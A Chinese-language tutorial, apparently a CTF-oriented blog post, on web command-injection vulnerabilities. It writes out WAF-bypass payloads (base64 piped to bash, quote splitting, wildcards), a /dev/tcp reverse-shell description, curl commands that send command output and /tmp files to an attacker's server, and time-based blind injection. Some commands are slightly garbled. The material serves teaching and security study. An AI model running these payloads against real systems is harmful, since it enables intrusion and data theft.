常见Web漏洞解析
命令执行漏洞
1.Bash与CMD常用命令
(1)Bash
读取文件:最常见的命令cat flag
在 Bash 中,cat 以及的tac、nl、more、head、less、tail、od、pr 均为文件读取相关命令,它们的区别如下:
·cat
按顺序依次输出各文件内容,常用于快速查看小文件内容,或在脚本中组合文件内容等场景。
· tac
与 cat 相反,tac flag 会将 flag 文件内容从最后一行到第一行依次显示。
· nl
nl flag 会在显示 flag 文件内容的同时,给每行添加上行号
· more
逐页显示文件内容,按空格键显示下一页,按回车键显示下一行。当使用 more flag 时,会以分页形式展示 flag 文件内容。但它不支持反向浏览,适用于粗略查看文件且不需要太多交互操作的场景。
· head
默认显示文件的前 10 行内容。可通过选项指定显示的行数,比如 head -n 5 flag 会显示 flag 文件的前 5 行。常用于快速查看文件开头部分内容,了解文件大致结构或开头关键信息。
· less
也是分页显示文件内容,功能比 more 更强大。支持前后翻页(使用 Page Up 和 Page Down 键等)、搜索内容(输入 / 后接关键词可向下搜索,? 后接关键词可向上搜索)等操作。输入 less flag 后,可对 flag 文件进行多种交互操作,适合查看较大文件且需要频繁定位内容的情况。
·tail
默认显示文件的最后 10 行内容,同样可通过选项指定显示行数,如 tail -n 5 flag 显示 flag 文件的最后 5 行。还可以使用 -f 选项实时查看文件追加的内容,常用于查看日志文件等,当有新日志写入时,tail -f 能即时显示新内容。
· od
以八进制、十六进制等多种格式显示文件内容,主要用于查看二进制文件或者文本文件的原始字节数据。od flag 会以特定的格式展示 flag 文件的底层数据形式,对于分析二进制文件结构等场景很有用。
· pr
用于将文件内容格式化输出,比如添加页眉、页脚,进行分页等处理,方便打印。例如 pr flag 会对 flag 文件内容进行格式化后输出,可通过选项设置页眉页脚样式、页宽等参数。
其他
rm a.txt 删除a.txt
mv a b 将a文件重命名为b
cp a a2 复制a到a2
ls 列出当前目录
ls/etc 列出 /etc 目录下的文件
(2)cmd
dir 显示目录里的文件和文件夹
cd 切换目录
md 创建新的文件夹
rd 删除文件夹(但前提是这个文件夹得是空的)
del 删除文件
cls 清屏
copy 复制文件(相当于Linux里的cp)
ren 重命名文件
type 显示文件的内容
2.命令执行漏洞的基础概念
调用了system函数,中间的参数可控,没对username进行过滤,里面内容可能被注入其他命令
利用命令连接符注入我们想要执行的命令(例如system('mkdir &ls'...):
A;B:无论A执行成功与否都会执行B
A&B:A后台执行,A、B同时执行
A&&B:A执行成功后才能执行B
A|B:A执行的结果作为B命令的参数,AB均会执行
A | |B:A 执行失败后执行B
注意:如果直接把一些特殊符号放在URL里,可能服务器根本识别不了你想要的命令。所以得对这些特殊符号进行URL编码。比如,";"编码后会变成"%3B","&"编码后是"%26"
3.过滤敏感字符串绕过的漏洞案例
黑名单过滤或者前面有安装WAF
WAF中会拦截、过滤各种字符
(1)过滤空格
可以用%09、%0a(在url编码中用得上)、{IFS}、IFS$9(在Linux shell中用得上)等字符来过滤关键字。
(2)过滤关键字(cat、flag等)
1)用开头的读取文件替代命令去读取文件。
2)在过滤的字符串中加入单引号、双引号或反斜杠( ca"t ca"'"t ca\t )
3)(printf"\\x6c\\x73") == Is:利用printf+16进制输出Is,再用()调用Is
4 ) echo Y2FOIGluZGV4LnBocA == | Base64-d | bash:Base64编码绕过,echo Base64的结果通过|又传入了Base64,解密命令后又传入bash执行。
5)利用通配符:catfl?g catf*("c*a*t f*l*g*.t*x*t"。这里"*"代表任意多个字符,这样就也可以模糊匹配到"cat flag.txt"命令)
6)a=c;b=at;ab:利用Linux下的变量拼接动态执行命令。
4.无回显的命令执行漏洞案例
无回显函数来执行命令时,可以用反弹shell,了解相关知识,并在ai上取了个生动形象的例子看我另一篇文章反弹shell-CSDN博客文章浏览阅读22次。这段代码就像是一把特殊的 "钥匙"。bash -i就像是打开 Shell 这扇门的初始动作,它启动了一个交互式的 bash Shell,就好像在屋子内部打开了一个可以操作的控制台。这部分,/dev/tcp是 Linux 系统里一种特殊的网络设备接口,ip是黑客自己服务器的地址,port是一个特定的端口号,这部分相当于让靶机按照黑客服务器的地址和端口号去建立一个连接,就像是让屋子里的人按照小偷给的地址和门牌号去敲门。0>&1则是把标准输入也导向这个连接,保证整个交互过程的顺畅。https://blog.csdn.net/2401_88743143/article/details/145573131?sharetype=blogdetail&sharerId=145573131&sharerefer=PC&sharesource=2401_88743143&sharefrom=mp_from_link
攻击时没有回显常用的payload就是sleep 5判断这里是否存在命令注入。存在漏洞就会延时5s,当我们输入cmd=sleep5,服务器等待5s才回显出页面的话,存在命令注入,可以开始外带数据了。一般常见的就是使用HTTP外带数据,使用curl或者wget: 先在服务器上设置一个监听端口,然后在靶机上发送post请求去监听端口curl http://服务器 IP/-X POST-d"a=`ls`"(如果没有反引号,还可以使用()代替。)如果不能用反引号,()这些嵌套命令执行符号,怎懡外带数据,在Linux中可以把命令执行的结果写入tmp目录,并且用curl把这个文件发到我们自己的机器上
命令解释:
1)首先用重定向符号>把命令执行结果写入到/tmp/re-sult中。
2)然后利用curl的-F参数将文件上传,将/tmp/result发送到远程服务器,参数格式如下 :- F"任意值=@文件路径"。
5.不出网的命令执行漏洞案例
假设web目录有写权限,那么我们可以把命令执行的结果写到Web根目录下(用>),然后去访问即可获得结果,http://127.0.0.1:8080/cmd.php? cmd=ls-1>1.txt
如果目录不可写,那么我们可以通过延时注入来获取内容,if [ 'whoami |cut-c 1'="r" ]; then sleep 2;fi
以上的命令盲注大致分3步。
1)首先是利用反引号执行whoami|cut-c1。获取到whoami的第一个字符r。
2)比较命令执行的返回结果和r,一致则返回True,否则就返回False。
3)最后进行if判断,如果为True,就sleep 2s。